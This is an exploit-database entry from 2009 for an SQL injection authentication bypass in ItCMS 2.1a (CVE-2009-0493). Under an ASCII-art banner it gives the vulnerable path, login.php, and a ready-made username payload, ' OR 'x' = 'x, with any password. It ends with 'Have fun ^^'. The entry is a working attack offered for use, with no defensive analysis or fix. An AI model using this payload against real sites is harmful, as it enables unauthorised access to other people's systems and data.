ItCMS 2.1a - Authentication Bypass



EKU-ID: 15530 CVE: OSVDB-51845;CVE-2009-0493 OSVDB-ID:
Author: certaindeath Published: 2009-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


                     __         .__            .___             __  .__
  ____  ____________/  |______  |__| ____    __| _/____ _____ _/  |_|  |__
_/ ___\/ __ \_  __ \   __\__  \ |  |/    \  / __ |/ __ \\__  \\   __\  |  \
\  \__\  ___/|  | \/|  |  / __ \|  |   |  \/ /_/ \  ___/ / __ \|  | |   Y  \
 \___  >___  >__|   |__| (____  /__|___|  /\____ |\___  >____  /__| |___|  /
     \/    \/                 \/        \/      \/    \/     \/          \/
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^

# milw0rm.com [2009-01-06]